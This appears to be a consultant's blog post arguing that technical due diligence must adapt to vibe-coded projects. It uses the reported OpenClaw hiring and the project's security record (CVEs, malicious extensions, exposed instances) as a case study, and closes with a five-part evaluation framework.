OpenAI just hired the creator of the most criticized open source project by the cybersecurity community in 2026. Ten critical CVEs, 824 malicious extensions, 135,000 instances exposed on the Internet. And yet, Sam Altman signed. What does this tell us about the state of technical due diligence today?
Six months ago, during my last technical due diligence on a merger-acquisition deal, things were fairly straightforward. We looked at code quality, test coverage, architecture, technical debt, key-person dependencies. We asked the CTO the right questions, audited the repo, checked the boxes. It was a rigorous but predictable exercise.
And then vibe coding came along.
Vibe coding is this way of building applications by conversing with AI. You describe what you want, Cursor or Claude Code generates the code, you iterate. A single developer can ship in one weekend what used to take a team of five three months. It's the printing press applied to code: anyone can now create.
The problem is that anyone can also create anything. And that anything can be worth hundreds of millions.
The textbook case: OpenClaw
In mid-February 2026, OpenAI announced the hiring of Peter Steinberger, an Austrian developer and creator of OpenClaw, an open source personal AI assistant. The project, launched in November 2025 under the name ClawdBot (renamed MoltBot after a trademark warning from Anthropic over the Claude brand, then OpenClaw), had broken every record: 200,000 GitHub stars, 41,800 forks, growth never seen before in the platform's history.
Sam Altman hailed a "genius" on X. The project would join an open source foundation backed by OpenAI. Steinberger would lead "the next generation of personal agents." Meta and Microsoft had also made offers. Satya Nadella had called personally.
Except that.
At the time of this deal, OpenClaw's security track record looked like an incident report, not a production-ready product.
The staggering numbers
Let's start with the CVEs — publicly referenced vulnerabilities. OpenClaw had accumulated ten at the time of the acquisition, along with fourteen GitHub Security Advisories, including five patched in the same week in late January 2026. Among them, CVE-2026-25253: a flaw enabling remote code execution with a single click, rated 8.8 out of 10 in severity. Simply visiting a booby-trapped web page was enough for an attacker to take full control of the agent, even on a locally configured instance. The victim's browser did all the work on its own.
In quick succession, two more critical flaws: an SSH command injection via a malicious project path on macOS (CVE-2026-25157), and a Docker sandbox bypass through PATH manipulation (CVE-2026-24763). All with public exploits — meaning anyone could use them.
On the marketplace side, the picture was even bleaker. ClawHub, the community extension repository, had 824 malicious skills identified by researchers. A Snyk study showed that 36 percent of all skills in the catalog contained security vulnerabilities. The most massive campaign, dubbed ClawHavoc, had distributed an infostealer targeting crypto wallets, SSH keys, and browser passwords on macOS.
Network exposure figures completed the picture. SecurityScorecard and Bitsight identified over 135,000 OpenClaw instances exposed on the Internet across 82 countries, with nearly 13,000 directly exploitable via remote code execution. The project's official Docker image alone carried 2,062 known vulnerabilities.
And the cherry on top: API tokens, authentication keys, and session data were stored in plaintext in Markdown and JSON files. The Supabase database for Moltbook, the satellite social network, had exposed 1.5 million API tokens and 35,000 email addresses.
Cisco Talos called the project a "security nightmare". The Register called it a "dumpster fire." Meta banned it from its corporate devices. Palo Alto Networks, CrowdStrike, Bitdefender, and Kaspersky all published dedicated security advisories.
When a journalist asked Steinberger about these issues, he responded that security "wasn't really something he wanted to prioritize". The project had no bug bounty program and no security budget.
So why did OpenAI sign?
This is the question that should haunt every tech M&A professional. And the answer is uncomfortable: because the traditional evaluation framework no longer captures what holds value in 2026.
What OpenAI bought wasn't code. OpenClaw's code is a construction site. What they bought is a creator who proved that a single developer, with the right AI tools, could build the fastest-growing open source project in history and rally a global community in a matter of weeks.
Steinberger embodies exactly the profile that vibe coding makes possible: a creative with a product vision, lightning-fast execution capability, and an intuitive understanding of what people want. That he doesn't master the security of what he builds — OpenAI will handle that. They have the teams, the resources, the infrastructure.
It's rational from the acquirer's perspective. But it's a warning signal for our profession.
What this changes for due diligence
When an acquirer can look at a project riddled with vulnerabilities, value it at an undisclosed but estimated multi-million-dollar amount, and consider it a good deal, it means our evaluation criteria are one step behind.
Code is no longer the primary asset. Talent, traction, and community now outweigh technical cleanliness. This is a paradigm shift you can accept or reject, but you cannot ignore it.
That said, it doesn't exempt anyone from doing the work. It requires doing it differently.
When I evaluate a project in 2026, the questions I ask the CTO are no longer the same as two years ago. Today, I want to see the development workflow live. Not a theoretical architecture, not a PowerPoint. I want to know which IDEs and CLIs the team uses daily. Do they work with multiple LLMs in cross-check, or do they copy-paste the first Cursor output without reviewing? Does the CI/CD pipeline exist and actually run, or do they deploy by pushing to main? Are unit tests there because they make sense, or because the AI mass-generated them to inflate coverage?
The real question, the one that cuts through, is this: does the team understand what it has built?
In OpenClaw's case, the answer was clearly no — at least on the security side. The creator said so himself. And OpenAI signed anyway, because the value lay elsewhere.
The framework I recommend
For acquirers who want to adapt their due diligence to this new reality, here are the five areas I recommend today.
The first is stack mastery. Ask for a live demo — unscripted. Have the people who made the architectural decisions explain them. If the team can't defend its technical choices without consulting the code, that's a red flag.
The second is a third-party security audit. AI-generated code has recurring vulnerability patterns. A specialized auditor spots them. This has become non-negotiable, especially for projects that grew fast.
The third is assessing invisible technical debt. Fragile dependencies, trendy frameworks that will be abandoned in eighteen months, overly verbose code that multiplies the attack surface. Vibe coding produces code that works but is often oversized and poorly optimized.
The fourth is analyzing the intent behind AI usage. Is the team using AI to go further, to amplify its creative capacity? Or is it using AI to replace expertise it never had? The first approach creates lasting value. The second creates technical debt disguised as productivity.
The fifth is the ability to maintain and evolve. A "vibe coded" project that can only be maintained by its original creator, with the same prompts and the same tools, is a single point of failure disguised as innovation.
The era of creatives — with a safety net
Vibe coding is a tremendous advance. It's the printing press of code, and like the printing press, it will transform our relationship with software creation. People who could never have built a product two years ago can now do it in a weekend. This is the era of creatives, and that's good news.
But the OpenClaw story reminds us that building fast and building well are two different things. And that our role as evaluators is precisely to tell the difference between the two.
OpenAI has the resources to turn a riddled project into a secure product. Most acquirers don't have that luxury. When you evaluate a tech target in 2026, don't let yourself be dazzled by GitHub stars and viral growth. Look under the hood. Ask the uncomfortable questions. And remember that a product that delights users but frightens security researchers is a liability as much as an asset.
Technical due diligence isn't dead. It just needs to learn how to evaluate a world where code has become disposable, but where talent, vision, and community are not.
To see how these principles apply in practice to B2G, read my case study on the B2B to B2G transition with aquagir and Numérique360. Need an outside perspective on an M&A deal or tech due diligence? Let's talk.
